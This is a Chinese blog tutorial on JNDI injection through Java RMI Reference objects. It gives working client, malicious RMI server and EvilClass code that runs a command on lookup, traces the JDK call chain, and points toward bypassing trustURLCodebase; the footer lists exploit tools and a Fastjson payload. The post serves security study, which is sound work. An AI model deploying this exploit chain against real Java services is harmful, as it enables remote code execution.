JNDI注入再理解

已于 2022-05-22 14:15:41 修改
阅读量378 收藏
点赞数
分类专栏: 漏洞原理 配套知识点 VulnReviewing 文章标签: java 开发语言 JNDI RMI
于 2022-05-21 12:23:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/124896542
版权

JNDI注入再理解


嗯,感觉以前对这个概念的理解不是很清楚,今天抽了时间再学习了学习。

JNDI提供了一个统一的接口屏蔽了一些协议负载的调用与使用过程,如RMI、LDAP、COBRA等,主要功能是实现了远程方法调用,针对JNID的攻击一般有以下两种,一种是注册在远程的对象由一些危险的方法,那么我们便可以直接使用注册中兴对外暴露的接口调用这些危险的方法来实现攻击,一类是我们可以直接在客户端向注册中心直接注册一个恶意对象,因为对象在传输过程中时序列化传输的,那么注册中心再加载该对象的时候会进行反序列化操作,那么如果我们的恶意对象的静态代码块中有一些危险操作那么便会直接被执行,因为静态代码块中的方法是在类加载过程中被调用的,且只会调用一次。
关于第一种情况,没什么好说的,只要我们能够远程调用接口便能完成攻击,当然是在你知道对方注册了什么危险对象的基础上。第二种情况也分多种情况,一是我们可以直接向远程注册恶意对象。二是我们可以利用JNDI的动态类加载机制完成攻击,一是利用CodeBase机制,如果客户端的lookup参数内容可控,那么我们便可以自行搭建一个注册中心,注册恶意类。那么客户端在调用的时候就会调用到我们的恶意对象,但是这有一个问题,如果是我们自行注册的恶意对象,那么客户端如果没有这个恶意类,客户端也是不会反序列化成功的,利用CodeBase机制我们可以在服务端指定恶意类的加载地址,当客户端请求该恶意对象的时候,客户端会一并将CodeBase指定的地址发送个客户端,如果客户端没有这个恶意类那么则会使用CodeBase指定的地址去加载恶意类,从而完成恶意类的自动调用。这里注意CodeBase是双向指定的,客户端可以指定,服务端也可以指定,当然优先使用的是服务端指定的地址。麻烦的是一些版本的JDK模式不允许CodeBase远程类加载,而且还涉及到java的安全管理器。另一种情况是利用JNDI Naming Reference,Reference类表示对存在于命名/目录系统以外的对象的引用,如果注册在注册中心的对象为Reference类的子类,那么再客户端获取到远程对象的存根实例的时候将使用Reference对象指定的远程地址与类名去加载恶意类从而完成攻击,可以注意到,这个攻击发生在客户端。因为Reference没有继承UnicastRemoteObject,所以我们需要对Reference类使用ReferenceWrapper对其进行包装,然后绑定在注册中心中才能实现远程调用。两种情况重点都是需要lookup函数参数可控,也就是可以指定远程服务器的位置,当然你如果可以操控对方远程服务器又另说。
这里我们介绍一下通过Reference类来实现JNDI注入,首先我们写一个客户端。

package com.armandhe.jnditest;

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class Client {
    public static void main(String[] args) throws NamingException {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        InitialContext initialContext = new InitialContext();
        Object lookup = initialContext.lookup("rmi://127.0.0.1/hacked");
    }
}

System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, “true”);

这一行代码是为了避免高版本的JDK值允许在指定位置加载类的特性
然后我们写一个服务端

package com.armandhe.jnditest;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;

public class Server {
    public static void main(String[] args) throws RemoteException, NamingException, MalformedURLException {
        String className = "com.armandhe.jnditest.EvilClass";
        String url = "file://E:\\securityTools\\源码\\jnditest\\src\\main\\java\\com\\armandhe\\jnditest\\EvilClass.class";
        LocateRegistry.createRegistry(1099);
        Reference reference = new Reference(className, className, url);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        Naming.rebind("hacked", referenceWrapper);
        System.out.println("rmi://127.0.0.1/hacked is working...");
    }
}

服务端就不起http服务器了,我们通过file协议将远程类的地址设置为本地文件系统,因为我的客户端与服务器在同一台机器上,所以这样也是可以的,然后声明一个注册中心,绑定一个端口,实例化一个Reference类,使用ReferenceWrapper对其进行包装,因为其继承了UnicastRemoteObject类,这样我们的Reference才能被远程调用
在这里插入图片描述

然后是我们的恶意类

package com.armandhe.jnditest;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EvilClass implements ObjectFactory {
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        Runtime.getRuntime().exec("calc");
        return null;
    }
}

在该类中我们集成了ObjectFactory类,重写了其getObjectInstance方法。
然后讲服务端与客户端分别运行起来,然后打断点进行调试
在这里插入图片描述
首先调用的是InitialContext#lookup方法,该方法首先调用了其静态方法getURLOrDefaultIniCtx,获取了一个Context对象,该Context对象是GenericURLContext类的一个实例,然后调用其lookup方法,出入jndi表达式
在这里插入图片描述
然后继续往下走进入到RegistryContext#lookup方法,该方法会调用decodeObject方法对远程对象进行解析,该方法接收两个参数,一个是我们远程获取的ReferenceWrapper对象,一个是我们的查询name,也就是hacked
在这里插入图片描述
方法体重首先会判断我们传入的对象是否是RemoteReference与Reference类的实例,然后进行强制类型转换为Reference对象,判断是否设置了远程类的位置,以及该地址是否是可信的CodeBase地址,这也是为什么我们最开始要设置com.sun.jndi.rmi.object.trustURLCodebase为true的原因,否则是不可能调用成功的。
在这里插入图片描述
方法体最终会调用NamingManager#getObjecInstance方法,传入我们的Reference对象与name

在这里插入图片描述
该方法中重点在第330行与332行,在330行调用getObjectFactoryFromReference闯入Reference对象与f,f就是我们的恶意类的全类名,该方法中或实例化我们的恶意类。
在这里插入图片描述
首先是在第148行获取了我们恶意类的Class对象,然后通过反射的方式对该类进行了实例化,所以我们的恶意类的恶意代码可以写在静态代码块、实例代码块、无参构造方法中。熟悉java类加载机制的都清楚,java的类夹杂核心方法为loadClass、defineClass、findClass,这已经很明显了
在这里插入图片描述
在这里插入图片描述
getObjectFactoryFromReference方法执行完成后会获得我们自定义的ObjectFactory对象,让后调用该对象的getObjectInstance方法,这也是我们的恶意代码可以写在该方法中的原因。
所以你注意到了吗,这种方式是不能绕过高版本JDK的trustURLCodebase机制的,所以有局限,那么要如何在高版本JDK使用这种方式注入呢,相比你已经很清楚了,我们之所以需要使用CodeBase是因为我们要加载的远程类在本地不存在,那么如果在客户端测存在我们要使用的恶意类不就完美的避免了CodeBase的保护机制了吗?所以我们下一章就去找一找这个tomcat或者JDK本地的危险Gadget

Iwanturoot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java代码审计】JNDI注入
大河之犬的博客
03-07 2062
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDIJava EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
JNDI-Injection-Exploit 使用教程
最新发布
gitblog_01056的博客
08-08 606
JNDI-Injection-Exploit 使用教程 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https:/...
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9527
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
JNDI注入是什么呀?
热门推荐
YvesHe的专栏
08-26 3万+
0x01 前言 我们在上一章《攻击rmi的方式》中提到了rmi的一大特性——动态类加载。而jndi注入就是利用的动态类加载完成攻击的。在谈jndi注入之前,我们先来看看关于jndi的基础知识 0x02 jndi是个啥 jndi的全称为Java Naming and Directory Interface(java命名和目录接口)SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统
JNDI注入详解
m0_60571990的博客
03-02 4174
JNDI注入详解
[Java安全]—JNDI注入
snowlyzz的博客
12-10 391
JDNI 注入
JNDI注入理解、JDK给出的修复
qq_37432174的博客
11-24 681
攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。Context.PROVIDER_URL参数表示指定一个远程加载的地址,例如上面的rmi://127.0.0.1:8080,当我们通过lookup函数进行查找对象的时候,其实就是在rmi://127.0.0.1:1099/m1sn0w这个里面进行的查找。当然,如果受害者内部存在漏洞组件存在反序列化漏洞的话,我们可以构造恶意的序列化对象,返回给客户端,当客户端在进行反序列化的时候,可以触发漏洞;
技术专栏 _ 深入理解JNDI注入Java反序列化漏洞利用.pdf
09-18
在深入探讨JNDI注入Java反序列化漏洞之前,我们需要对几个关键概念有所了解,这包括Java远程方法调用(RMI)、Java名称目录接口(JNDI)、Java远程消息交换协议(JRMP)、以及序列化和反序列化。 RMIJava环境中...
Log4j 注入漏洞:深入理解JNDI注入Java反序列化漏洞的利用
Java Punk
12-23 3454
我翻阅了许多专题文章,其中有2篇文章写的非常不错,完美解答了我对 “Log4j 注入漏洞” 的疑问
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
JNDI注入学习1
08-03
**JNDI注入详解** ...通过理解JNDI注入的原理和防范措施,开发者可以有效地保护他们的应用程序免受这种攻击方式的威胁。在编写代码时,始终牢记安全优先,对用户输入进行严格的检查和过滤,是预防这类漏洞的关键。
JNDI注入
xlsj雪松的博客
03-09 732
1 原理介绍 Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串, 支持将Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 1.1 JNDI 调用RMI RMI(Remote Method Invocation)是专为Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法JNDI的全称为(Java Naming.
JNDI注入解析
gental_z的博客
01-04 7777
一、什么是JNDIJNDI全称为Java命名和目录接口。我们可以理解JNDI提供了两个服务,即命名服务和目录服务。 ​ 命名服务将一个对象和一个名称进行绑定,然后放置到一个容器里面。当我们想要获取这个对象的时候,就可以通过容器来查找这个名称,从而获得这个对象。 ​ 目录服务就是将一些对象的属性放置到容器中,然后想要操作这个属性的时候,就通过容器来进行查找。 ​ 对比一下命名服务和目录服务,其实命名服务就是绑定对象,而目录服务就是绑定了对象的属性。在JNDI中,命名服务和目录服务是一起结合提供的,最容
Java代码审计系列之 JNDI注入
风炫的博客
06-08 1707
Java代码审计系列之 JNDI注入 0x01 前言 在Java反序列化漏洞挖掘或利用的时候经常会遇到RMIJNDI、JRMP这些概念,其中RMI是一个基于序列化的Java远程方法调用机制。作为一个常见的反序列化入口,它和反序列化漏洞有着千丝万缕的联系。除了直接攻击RMI服务接口外(比如:CVE-2017-3241),我们在构造反序列化漏洞利用时也可以结合RMI方便的实现远程代码执行。 我们在之前的课程中说到过动态类的加载,而jndi注入就是利用动态类的加载来完成攻击的,在这之前,我们先来了解一下jndi
Javaweb安全——JNDI注入
weixin_43610673的博客
07-21 1433
测试环境为JDK8u111以及8u211JavaNamingandDirectoryInterface(JNDI)是一个和JDBC、LDAP、RMI、DNS。名称与对象相关联的方法,例如地址、标识符或计算机程序通常使用的对象。目录服务是命名服务的扩展,除了提供名称和对象的关联,。在一个实际的名称服务中,有些对象可能无法直接存储在系统内,而是以引用的形式进行存储。引用包含了如何访问实际对象的信息。对象工厂是对象的生产者。它接受有关如何创建对象的一些信息,例如引用,然后返回该对象的实例。的错误。...
深入理解Spring框架:IoC与依赖注入核心
"深入理解Spring框架的核心特性与应用" Spring框架是Java开发中极其重要的一个组件,它以其依赖注入(Dependency Injection, DI)和控制反转(Inversion of Control, IoC)的核心理念,极大地简化了软件的开发过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值